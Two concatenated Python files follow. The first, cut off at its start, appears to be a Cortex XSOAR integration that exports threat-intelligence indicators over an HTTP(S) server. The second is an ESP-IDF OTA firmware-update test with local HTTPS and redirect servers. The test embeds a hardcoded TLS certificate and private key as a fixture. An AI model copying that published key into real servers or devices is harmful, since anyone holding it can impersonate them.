"""
iocs: List[dict] = []
if not last_found_len:
last_found_len = total_fetched
search_indicators = IndicatorsSearcher(page=next_page)
while last_found_len == PAGE_SIZE and limit and total_fetched < limit:
fetched_iocs = search_indicators.search_indicators_by_version(query=indicator_query, size=PAGE_SIZE).get('iocs')
iocs.extend(fetched_iocs)
last_found_len = len(fetched_iocs)
total_fetched += last_found_len
return iocs, search_indicators.page
def ip_groups_to_cidrs(ip_range_groups: list):
"""Collapse ip groups list to CIDRs
Args:
ip_range_groups (list): a list of lists containing connected IPs
Returns:
list. a list of CIDRs.
"""
ip_ranges = [] # type:List
for cidr in ip_range_groups:
# handle single ips
if len(cidr) == 1:
# CIDR with a single IP appears with "/32" suffix so handle them differently
ip_ranges.append(str(cidr[0]))
continue
ip_ranges.append(str(cidr))
return ip_ranges
def ip_groups_to_ranges(ip_range_groups: list):
"""Collapse ip groups list to ranges.
Args:
ip_range_groups (list): a list of lists containing connected IPs
Returns:
list. a list of Ranges.
"""
ip_ranges = [] # type:List
for group in ip_range_groups:
# handle single ips
if len(group) == 1:
ip_ranges.append(str(group[0]))
continue
ip_ranges.append(str(group))
return ip_ranges
def ips_to_ranges(ips: list, collapse_ips: str):
"""Collapse IPs to Ranges or CIDRs.
Args:
ips (list): a list of IP strings.
collapse_ips (str): Whether to collapse to Ranges or CIDRs.
Returns:
list. a list to Ranges or CIDRs.
"""
if collapse_ips == COLLAPSE_TO_RANGES:
ips_range_groups = IPSet(ips).iter_ipranges()
return ip_groups_to_ranges(ips_range_groups)
else:
cidrs = IPSet(ips).iter_cidrs()
return ip_groups_to_cidrs(cidrs)
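# Editor's note (illustrative example, assuming netaddr's usual string formatting):
#   ips_to_ranges(['1.1.1.1', '1.1.1.2', '1.1.1.3'], COLLAPSE_TO_RANGES)
#       -> ['1.1.1.1-1.1.1.3']
#   ips_to_ranges(['1.1.1.1', '1.1.1.2', '1.1.1.3'], COLLAPSE_TO_CIDR)
#       -> ['1.1.1.1', '1.1.1.2/31']   # a single-address CIDR is emitted without the /32 suffix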
def panos_url_formatting(iocs: list, drop_invalids: bool, strip_port: bool):
formatted_indicators = [] # type:List
for indicator_data in iocs:
# only format URLs and Domains
indicator = indicator_data.get('value')
if not indicator:
continue
if indicator_data.get('indicator_type') in ['URL', 'Domain', 'DomainGlob']:
indicator = indicator.lower()
# remove initial protocol - http/https/ftp/ftps etc
indicator = _PROTOCOL_REMOVAL.sub('', indicator)
indicator_with_port = indicator
# remove port from indicator - from demisto.com:369/rest/of/path -> demisto.com/rest/of/path
indicator = _PORT_REMOVAL.sub(r'\g<1>', indicator)
# check if removing the port changed something about the indicator
if indicator != indicator_with_port and not strip_port:
# if port was in the indicator and strip_port param not set - ignore the indicator
continue
with_invalid_tokens_indicator = indicator
# remove invalid tokens from indicator
indicator = _INVALID_TOKEN_REMOVAL.sub('*', indicator)
# check if the indicator held invalid tokens
if with_invalid_tokens_indicator != indicator:
# invalid tokens in indicator- if drop_invalids is set - ignore the indicator
if drop_invalids:
continue
# check if after removing the tokens the indicator is too broad if so - ignore
# example of too broad terms: "*.paloalto", "*.*.paloalto", "*.paloalto:60"
hostname = indicator
if '/' in hostname:
hostname, _ = hostname.split('/', 1)
if _BROAD_PATTERN.match(hostname) is not None:
continue
# for PAN-OS "*.domain.com" does not match "domain.com" - we should provide both
if indicator.startswith('*.'):
formatted_indicators.append(indicator[2:])
formatted_indicators.append(indicator)
return {CTX_VALUES_KEY: list_to_str(formatted_indicators, '\n')}, len(formatted_indicators)
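# Editor's note (worked example, not in the original): with strip_port=True and
# drop_invalids=False, a URL indicator such as 'https://Demisto.com:443/rest/of/path' is
# lower-cased, loses its scheme via _PROTOCOL_REMOVAL and its port via _PORT_REMOVAL, and
# is emitted as 'demisto.com/rest/of/path'. With strip_port=False the same value is
# skipped entirely, because removing the port changed the indicator.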
def create_json_out_format(iocs: list):
formatted_indicators = [] # type:List
for indicator_data in iocs:
if indicator_data.get("value"):
json_format_indicator = json_format_single_indicator(indicator_data)
formatted_indicators.append(json_format_indicator)
return {CTX_VALUES_KEY: json.dumps(formatted_indicators)}
def json_format_single_indicator(indicator: dict):
json_format_indicator = {
"indicator": indicator.get("value")
}
indicator.pop("value", None)
json_format_indicator["value"] = indicator
return json_format_indicator
def add_indicator_to_category(indicator, category, category_dict):
if category in category_dict.keys():
category_dict[category].append(indicator)
else:
category_dict[category] = [indicator]
return category_dict
def create_proxysg_out_format(iocs: list, category_attribute: list, category_default: str = 'bc_category'):
formatted_indicators = ''
category_dict = {} # type:Dict
num_of_returned_indicators = 0
for indicator in iocs:
if indicator.get('indicator_type') in ['URL', 'Domain', 'DomainGlob'] and indicator.get('value'):
indicator_proxysg_category = indicator.get('proxysgcategory')
# if a ProxySG category is set and it is in the category_attribute list (or the attribute list is empty),
# then add the indicator to its category list
if indicator_proxysg_category is not None and \
(indicator_proxysg_category in category_attribute or len(category_attribute) == 0):
category_dict = add_indicator_to_category(indicator.get('value'), indicator_proxysg_category,
category_dict)
else:
# if ProxySG Category is not set or does not exist in the category_attribute list
category_dict = add_indicator_to_category(indicator.get('value'), category_default, category_dict)
for category, indicator_list in category_dict.items():
sub_output_string = f"define category {category}\n"
sub_output_string += list_to_str(indicator_list, '\n')
sub_output_string += "\nend\n"
formatted_indicators += sub_output_string
num_of_returned_indicators = num_of_returned_indicators + len(indicator_list)
if len(formatted_indicators) == 0:
raise Exception(CTX_NO_URLS_IN_PROXYSG_FORMAT)
return {CTX_VALUES_KEY: formatted_indicators}, num_of_returned_indicators
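# Editor's note (illustrative): the ProxySG output groups URL/Domain values into
# "define category ... end" blocks. For example, two indicators without a proxysgcategory
# attribute and the default bc_category would be rendered as:
#   define category bc_category
#   demisto.com
#   example.com
#   end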
def create_mwg_out_format(iocs: list, mwg_type: str) -> dict:
formatted_indicators = [] # type:List
for indicator in iocs:
if not indicator.get('value'):
continue
value = "\"" + indicator.get('value') + "\""
sources = indicator.get('sourceBrands')
if sources:
sources_string = "\"" + ','.join(sources) + "\""
else:
sources_string = "\"from CORTEX XSOAR\""
formatted_indicators.append(value + " " + sources_string)
string_formatted_indicators = list_to_str(formatted_indicators, '\n')
if isinstance(mwg_type, list):
mwg_type = mwg_type[0]
string_formatted_indicators = "type=" + mwg_type + "\n" + string_formatted_indicators
return {CTX_VALUES_KEY: string_formatted_indicators}
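# Editor's note (illustrative): the McAfee Web Gateway output is a type header followed by
# one quoted value per line together with its quoted source brands, e.g. for
# mwg_type='string' and an indicator with no sourceBrands:
#   type=string
#   "demisto.com" "from CORTEX XSOAR"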
def create_values_for_returned_dict(iocs: list, request_args: RequestArguments) -> Tuple[dict, int]:
"""
Create a dictionary for output values using the selected format (json, json-seq, text, csv, McAfee Web Gateway,
Symantec ProxySG, panosurl)
"""
if request_args.out_format == FORMAT_PANOSURL:
return panos_url_formatting(iocs, request_args.drop_invalids, request_args.strip_port)
if request_args.out_format == FORMAT_PROXYSG:
return create_proxysg_out_format(iocs, request_args.category_attribute, request_args.category_default)
if request_args.out_format == FORMAT_MWG:
return create_mwg_out_format(iocs, request_args.mwg_type), len(iocs)
if request_args.out_format == FORMAT_JSON:
return create_json_out_format(iocs), len(iocs)
if request_args.out_format == FORMAT_XSOAR_JSON:
iocs_list = [ioc for ioc in iocs]
return {CTX_VALUES_KEY: json.dumps(iocs_list)}, len(iocs)
else:
ipv4_formatted_indicators = []
ipv6_formatted_indicators = []
formatted_indicators = []
if request_args.out_format == FORMAT_XSOAR_CSV and len(iocs) > 0: # add csv keys as first item
headers = list(iocs[0].keys())
formatted_indicators.append(list_to_str(headers))
elif request_args.out_format == FORMAT_CSV and len(iocs) > 0:
formatted_indicators.append('indicator')
for ioc in iocs:
value = ioc.get('value')
type = ioc.get('indicator_type')
if value:
if request_args.out_format in [FORMAT_TEXT, FORMAT_CSV]:
if type == 'IP' and request_args.collapse_ips != DONT_COLLAPSE:
ipv4_formatted_indicators.append(IPAddress(value))
elif type == 'IPv6' and request_args.collapse_ips != DONT_COLLAPSE:
ipv6_formatted_indicators.append(IPAddress(value))
else:
formatted_indicators.append(value)
elif request_args.out_format == FORMAT_XSOAR_JSON_SEQ:
formatted_indicators.append(json.dumps(ioc))
elif request_args.out_format == FORMAT_JSON_SEQ:
json_format_indicator = json_format_single_indicator(ioc)
formatted_indicators.append(json.dumps(json_format_indicator))
elif request_args.out_format == FORMAT_XSOAR_CSV:
# wrap csv values with " to escape them
values = list(ioc.values())
formatted_indicators.append(list_to_str(values, map_func=lambda val: f'"{val}"'))
if len(ipv4_formatted_indicators) > 0:
ipv4_formatted_indicators = ips_to_ranges(ipv4_formatted_indicators, request_args.collapse_ips)
formatted_indicators.extend(ipv4_formatted_indicators)
if len(ipv6_formatted_indicators) > 0:
ipv6_formatted_indicators = ips_to_ranges(ipv6_formatted_indicators, request_args.collapse_ips)
formatted_indicators.extend(ipv6_formatted_indicators)
return {CTX_VALUES_KEY: list_to_str(formatted_indicators, '\n')}, len(formatted_indicators)
def get_outbound_mimetype() -> str:
"""Returns the mimetype of the export_iocs"""
ctx = get_integration_context().get('last_output', {})
return ctx.get(CTX_MIMETYPE_KEY, 'text/plain')
def get_outbound_ioc_values(on_demand, request_args: RequestArguments,
last_update_data=None, cache_refresh_rate=None) -> str:
"""
Get the IoC values to return to the caller
"""
if last_update_data is None:
last_update_data = {}
last_update = last_update_data.get('last_run')
last_query = last_update_data.get('last_query')
current_iocs = last_update_data.get('current_iocs')
# on_demand ignores cache
if on_demand:
if request_args.is_request_change(last_update_data):
values_str = get_ioc_values_str_from_context(request_args=request_args, iocs=current_iocs)
else:
values_str = get_ioc_values_str_from_context(request_args=request_args)
else:
if last_update:
# compute the timestamp that is cache_refresh_rate back from the current run time
cache_time, _ = parse_date_range(cache_refresh_rate, to_timestamp=True)
if last_update <= cache_time or request_args.is_request_change(last_update_data) or \
request_args.query != last_query:
values_str = refresh_outbound_context(request_args=request_args)
else:
values_str = get_ioc_values_str_from_context(request_args=request_args)
else:
values_str = refresh_outbound_context(request_args)
return values_str
def get_ioc_values_str_from_context(request_args: RequestArguments, iocs=None) -> str:
"""
Extracts output values from cache
"""
if iocs:
if request_args.offset > len(iocs):
return ''
iocs = iocs[request_args.offset: request_args.limit + request_args.offset]
returned_dict, _ = create_values_for_returned_dict(iocs, request_args=request_args)
current_cache = get_integration_context()
current_cache['last_output'] = returned_dict
set_integration_context(current_cache)
else:
returned_dict = get_integration_context().get('last_output', {})
return returned_dict.get(CTX_VALUES_KEY, '')
def try_parse_integer(int_to_parse: Any, err_msg: str) -> int:
"""
Tries to parse an integer; if it fails, raises a DemistoException with the given err_msg
"""
try:
res = int(int_to_parse)
except (TypeError, ValueError):
raise DemistoException(err_msg)
return res
def validate_basic_authentication(headers: dict, username: str, password: str) -> bool:
"""
Checks whether the authentication is valid.
:param headers: The headers of the http request
:param username: The integration's username
:param password: The integration's password
:return: Boolean which indicates whether the authentication is valid or not
"""
credentials: str = headers.get('Authorization', '')
if not credentials or 'Basic ' not in credentials:
return False
encoded_credentials: str = credentials.split('Basic ')[1]
credentials: str = b64decode(encoded_credentials).decode('utf-8')
if ':' not in credentials:
return False
credentials_list = credentials.split(':')
if len(credentials_list) != 2:
return False
user, pwd = credentials_list
return user == username and pwd == password
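# Editor's note (worked example, not in the original): a request carrying the header
#   Authorization: Basic dXNlcjpwYXNz
# decodes to 'user:pass', so it is accepted only when the integration credentials are
# username 'user' and password 'pass'; anything without the 'Basic ' prefix or without a
# ':' separator in the decoded value is rejected.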
''' ROUTE FUNCTIONS '''
def get_request_args(params):
limit = try_parse_integer(request.args.get('n', params.get('list_size', 10000)), CTX_LIMIT_ERR_MSG)
offset = try_parse_integer(request.args.get('s', 0), CTX_OFFSET_ERR_MSG)
out_format = request.args.get('v', params.get('format', 'text'))
query = request.args.get('q', params.get('indicators_query'))
mwg_type = request.args.get('t', params.get('mwg_type', "string"))
strip_port = request.args.get('sp', params.get('strip_port', False))
drop_invalids = request.args.get('di', params.get('drop_invalids', False))
category_default = request.args.get('cd', params.get('category_default', 'bc_category'))
category_attribute = request.args.get('ca', params.get('category_attribute', ''))
collapse_ips = request.args.get('tr', params.get('collapse_ips', DONT_COLLAPSE))
csv_text = request.args.get('tx', params.get('csv_text', False))
sort_field = request.args.get('sf', params.get('sort_field'))
sort_order = request.args.get('so', params.get('sort_order'))
# handle flags
if strip_port is not None and strip_port == '':
strip_port = True
if drop_invalids is not None and drop_invalids == '':
drop_invalids = True
if csv_text is not None and csv_text == '':
csv_text = True
if collapse_ips is not None and collapse_ips not in [DONT_COLLAPSE, COLLAPSE_TO_CIDR, COLLAPSE_TO_RANGES]:
collapse_ips = try_parse_integer(collapse_ips, CTX_COLLAPSE_ERR_MSG)
if collapse_ips == 0:
collapse_ips = DONT_COLLAPSE
elif collapse_ips == 1:
collapse_ips = COLLAPSE_TO_RANGES
elif collapse_ips == 2:
collapse_ips = COLLAPSE_TO_CIDR
# fall back to the integration params when empty values were provided
if len(query) == 0:
query = params.get('indicators_query')
if len(out_format) == 0:
out_format = params.get('format', 'text')
if out_format not in [FORMAT_PROXYSG, FORMAT_PANOSURL, FORMAT_TEXT, FORMAT_JSON, FORMAT_CSV,
FORMAT_JSON_SEQ, FORMAT_MWG, FORMAT_ARG_BLUECOAT, FORMAT_ARG_MWG, FORMAT_ARG_PANOSURL,
FORMAT_ARG_PROXYSG, FORMAT_ARG_PANOSURL, FORMAT_XSOAR_JSON, FORMAT_ARG_XSOAR_JSON,
FORMAT_XSOAR_JSON_SEQ, FORAMT_ARG_XSOAR_JSON_SEQ, FORMAT_XSOAR_CSV, FORMAT_ARG_XSOAR_CSV]:
raise DemistoException(CTX_FORMAT_ERR_MSG)
elif out_format in [FORMAT_ARG_PROXYSG, FORMAT_ARG_BLUECOAT]:
out_format = FORMAT_PROXYSG
elif out_format == FORMAT_ARG_MWG:
out_format = FORMAT_MWG
elif out_format == FORMAT_ARG_PANOSURL:
out_format = FORMAT_PANOSURL
elif out_format == FORMAT_ARG_XSOAR_JSON:
out_format = FORMAT_XSOAR_JSON
elif out_format == FORAMT_ARG_XSOAR_JSON_SEQ:
out_format = FORMAT_XSOAR_JSON_SEQ
elif out_format == FORMAT_ARG_XSOAR_CSV:
out_format = FORMAT_XSOAR_CSV
if out_format == FORMAT_MWG:
if mwg_type not in MWG_TYPE_OPTIONS:
raise DemistoException(CTX_MWG_TYPE_ERR_MSG)
return RequestArguments(query, out_format, limit, offset, mwg_type, strip_port, drop_invalids, category_default,
category_attribute, collapse_ips, csv_text, sort_field, sort_order)
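# Editor's note (illustrative): the boolean query parameters are detected by presence
# rather than by value, so a hypothetical request such as
#   https://<server>:<port>/?q=type:URL&v=panosurl&sp&di
# selects the PAN-OS URL format and enables strip_port and drop_invalids because 'sp' and
# 'di' appear with empty values, while numeric 'tr' values map 0/1/2 to Don't Collapse,
# To Ranges and To CIDRs respectively.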
@APP.route('/', methods=['GET'])
def route_list_values() -> Response:
"""
Main handler for values saved in the integration context
"""
try:
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if username and password:
headers: dict = cast(Dict[Any, Any], request.headers)
if not validate_basic_authentication(headers, username, password):
err_msg: str = 'Basic authentication failed. Make sure you are using the right credentials.'
demisto.debug(err_msg)
return Response(err_msg, status=401)
request_args = get_request_args(params)
values = get_outbound_ioc_values(
on_demand=params.get('on_demand'),
last_update_data=get_integration_context(),
cache_refresh_rate=params.get('cache_refresh_rate'),
request_args=request_args
)
if not get_integration_context() and params.get('on_demand'):
values = 'You are running in On-Demand mode - please run !eis-update command to initialize the ' \
'export process'
elif not values:
values = "No Results Found For the Query"
mimetype = get_outbound_mimetype()
return Response(values, status=200, mimetype=mimetype)
except Exception:
return Response(traceback.format_exc(), status=400, mimetype='text/plain')
''' COMMAND FUNCTIONS '''
def test_module(args, params):
"""
Validates:
1. Valid port.
2. Valid cache_refresh_rate
"""
get_params_port(params)
on_demand = params.get('on_demand', None)
if not on_demand:
try_parse_integer(params.get('list_size'), CTX_LIMIT_ERR_MSG) # validate export_iocs Size was set
query = params.get('indicators_query') # validate indicators_query isn't empty
if not query:
raise ValueError('"Indicator Query" is required. Provide a valid query.')
cache_refresh_rate = params.get('cache_refresh_rate', '')
if not cache_refresh_rate:
raise ValueError(CTX_MISSING_REFRESH_ERR_MSG)
# validate cache_refresh_rate value
range_split = cache_refresh_rate.split(' ')
if len(range_split) != 2:
raise ValueError(CTX_MISSING_REFRESH_ERR_MSG)
try_parse_integer(range_split[0], 'Invalid time value for the Refresh Rate. Must be a valid integer.')
if not range_split[1] in ['minute', 'minutes', 'hour', 'hours', 'day', 'days', 'month', 'months', 'year',
'years']:
raise ValueError(
'Invalid time unit for the Refresh Rate. Must be minutes, hours, days, months, or years.')
parse_date_range(cache_refresh_rate, to_timestamp=True)
run_long_running(params, is_test=True)
return 'ok'
def run_long_running(params, is_test=False):
"""
Start the long running server
:param params: Demisto params
:param is_test: Indicates whether it's test-module run or regular run
:return: None
"""
certificate: str = params.get('certificate', '')
private_key: str = params.get('key', '')
certificate_path = str()
private_key_path = str()
try:
port = get_params_port(params)
ssl_args = dict()
if (certificate and not private_key) or (private_key and not certificate):
raise DemistoException('If using HTTPS connection, both certificate and private key should be provided.')
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
context = SSLContext(PROTOCOL_TLSv1_2)
context.load_cert_chain(certificate_path, private_key_path)
ssl_args['ssl_context'] = context
demisto.debug('Starting HTTPS Server')
else:
demisto.debug('Starting HTTP Server')
server = WSGIServer(('', port), APP, **ssl_args, log=DEMISTO_LOGGER)
if is_test:
server_process = Process(target=server.serve_forever)
server_process.start()
time.sleep(5)
server_process.terminate()
else:
server.serve_forever()
except SSLError as e:
ssl_err_message = f'Failed to validate certificate and/or private key: {str(e)}'
demisto.error(ssl_err_message)
raise ValueError(ssl_err_message)
except Exception as e:
demisto.error(f'An error occurred in long running loop: {str(e)}')
raise ValueError(str(e))
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
def update_outbound_command(args, params):
"""
Updates the export_iocs values and format on demand
"""
on_demand = params.get('on_demand')
if not on_demand:
raise DemistoException(
'"Update exported IOCs On Demand" is off. If you want to update manually please toggle it on.')
limit = try_parse_integer(args.get('list_size', params.get('list_size')), CTX_LIMIT_ERR_MSG)
print_indicators = args.get('print_indicators')
query = args.get('query')
# if no query is entered, take the query from the integration params
if not query:
query = params.get('indicators_query')
out_format = args.get('format')
offset = try_parse_integer(args.get('offset', 0), CTX_OFFSET_ERR_MSG)
mwg_type = args.get('mwg_type')
strip_port = args.get('strip_port') == 'True'
drop_invalids = args.get('drop_invalids') == 'True'
category_attribute = args.get('category_attribute')
category_default = args.get('category_default')
collapse_ips = args.get('collapse_ips')
csv_text = args.get('csv_text') == 'True'
sort_field = args.get('sort_field')
sort_order = args.get('sort_order')
request_args = RequestArguments(query, out_format, limit, offset, mwg_type, strip_port, drop_invalids,
category_default, category_attribute, collapse_ips, csv_text, sort_field, sort_order)
indicators = refresh_outbound_context(request_args)
if indicators:
hr = tableToMarkdown('List was updated successfully with the following values', indicators,
['Indicators']) if print_indicators == 'true' else 'List was updated successfully'
else:
hr = "No Results Found For the Query"
return CommandResults(readable_output=hr, raw_response=indicators)
def main():
"""
Main
"""
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if (username and not password) or (password and not username):
err_msg: str = 'If using credentials, both username and password should be provided.'
demisto.debug(err_msg)
raise DemistoException(err_msg)
command = demisto.command()
demisto.debug('Command being called is {}'.format(command))
commands = {
'test-module': test_module,
'eis-update': update_outbound_command
}
try:
if command == 'long-running-execution':
run_long_running(params)
elif command in commands:
return_results(commands[command](demisto.args(), params))
else:
raise NotImplementedError(f'Command "{command}" is not implemented.')
except Exception as e:
err_msg = f'Error in {INTEGRATION_NAME} Integration [{e}]'
return_error(err_msg)
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
example_test.py
|
import http.server
import os
import random
import re
import socket
import ssl
import struct
import subprocess
from threading import Thread
import ttfw_idf
from tiny_test_fw import DUT
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
'3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
'3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
'2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
'8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
'1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
'10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
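# Editor's note: connecting a UDP socket to a public address does not send any traffic; it
# only makes the OS pick the outbound interface, so getsockname() returns the LAN IP that
# the DUT can reach.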
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, 'w+') as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, 'server_cert.pem')
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, 'server_key.pem')
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
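# Editor's note (illustrative): 'openssl s_server -WWW' emulates a minimal HTTPS file
# server that resolves request paths relative to the current working directory (set to
# ota_image_dir by get_ca_cert above), so the DUT can fetch the binary from a URL like
# https://<host_ip>:8070/advanced_https_ota.bin.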
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
print('Sending resp, URL: ' + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RedirectHandler
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
server_file, key_file = get_ca_cert(ota_image_dir)
redirectHandler = redirect_handler_factory('https://' + server_ip + ':' + str(redirection_port) + '/advanced_https_ota.bin')
httpd = http.server.HTTPServer((server_ip, server_port), redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
This is a positive test case, which downloads the complete binary file multiple times.
The number of iterations can be specified in the variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
